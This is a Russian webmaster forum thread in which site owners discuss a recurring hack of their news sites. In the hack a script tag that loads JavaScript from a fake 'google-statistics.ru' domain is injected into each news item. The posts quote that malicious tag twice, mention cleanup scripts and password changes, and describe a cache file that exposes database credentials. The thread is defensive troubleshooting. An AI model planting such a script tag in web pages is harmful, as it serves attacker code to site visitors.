- Поисковые системы
- Практика оптимизации
- Трафик для сайтов
- Монетизация сайтов
- Сайтостроение
- Социальный Маркетинг
- Общение профессионалов
- Биржа и продажа
- Финансовые объявления
- Работа на постоянной основе
- Сайты - покупка, продажа
- Соцсети: страницы, группы, приложения
- Сайты без доменов
- Трафик, тизерная и баннерная реклама
- Продажа, оценка, регистрация доменов
- Ссылки - обмен, покупка, продажа
- Программы и скрипты
- Размещение статей
- Инфопродукты
- Прочие цифровые товары
- Работа и услуги для вебмастера
- Оптимизация, продвижение и аудит
- Ведение рекламных кампаний
- Услуги в области SMM
- Программирование
- Администрирование серверов и сайтов
- Прокси, ВПН, анонимайзеры, IP
- Платное обучение, вебинары
- Регистрация в каталогах
- Копирайтинг, переводы
- Дизайн
- Usability: консультации и аудит
- Изготовление сайтов
- Наполнение сайтов
- Прочие услуги
- Не про работу
заливаете в корень сайта - запускаете, нажимаете кнопочку и всё - новости чистые.
Сегодня ночью опять в новости код впихнули
<script async=\"async\" type=\"text/javascript\" src=\"http://google-statistics.ru/js/6512bd43d9caa6e02c990b0a82652dca.js\"></script>
И самое интересное что в каждой новости он разный, руками чистить тысячи новостей нереально. Поставил скриптик, запустил, 3 секунды и новости чистые, хорошая вещь.
Аналогично! Причем часть скрипта 6512bd43d9caa6e02c990b0a82652dca.js везде разная. Также, воспользовался ранее приведенным тут скриптом, все отлично! Еще раз спасибо за него. :)
Но уязвимость остается где-то. ПМА был обновлен до последней версии.
Все запустилось отлично, а я уже почти волосы на голове стал рвать.
Сегодня ночью опять в новости код впихнули
<script async=\"async\" type=\"text/javascript\" src=\"http://google-statistics.ru/js/6512bd43d9caa6e02c990b0a82652dca.js\"></script>
И самое интересное что в каждой новости он разный, руками чистить тысячи новостей нереально. Поставил скриптик, запустил, 3 секунды и новости чистые, хорошая вещь.
Да, сейчас тоже обнаружил эту дрянь на одном из сайтов, но ранее он не был заражен и по нему я не проводил лечение по всем пунктам. У вас ранее этот сайт лечился?
Да, сейчас тоже обнаружил эту дрянь на одном из сайтов, но ранее он не был заражен и по нему я не проводил лечение по всем пунктам. У вас ранее этот сайт лечился?
У меня ранее на сегодняшнем сайте тоже не появлялась эта зараза. Но лечение я проводил по всем сайтам, в т.ч. и по этому... Поэтому, уже на 99% уверен, что все наши манипуляции с обновлением Min, заплаткой на оф сайте, сменой паролей, переименовыванием админки, чисткой компа, чисткой кеша, обновлением ПМА - бесполезны.
После взлома в папке engine/cache/system/ появляется файл с названиям minify_dbconfig.php.js_5cf6c499f8c1dd32450a5bf6981022a5, при чем цифры в конце названия могут быть любыми. В одном из случаев появилось даже два файла. В них и хранятся пароли к БД, его хакер в легкостью сможет прочитать.
Посмотрите у себя.У меня вот так.
Посмотрите у себя.У меня вот так.
Такого нет, но есть как-то так:
minify_tabset.js_212e23c50d4922d47798586e59218ddb
minify_highslide.js_e2d0316dedd38426a0bb16cb6c118d81.gz
minify_g=general_059020ae889b0b18ce57154d2adde05c
minify_calendar,tabs,autocomplete,chosen.js_bc9c97ab8a426ca9ee96aac6109cd9f1
У меня и в прошлые разы такого файлика не было и сейчас тоже пусто...
Скорее всего у вас его нет из- за того что вы чистите кеш сайта, а так при первом взломе, если не стоит последний баг-фикс этот файл появится.
ProLiant, попробуйте отключить пма на время и тестируйте.
У меня он отключен.
Также после этого смените пароли не только к самому mysql, но и ко всем пользователям у БД.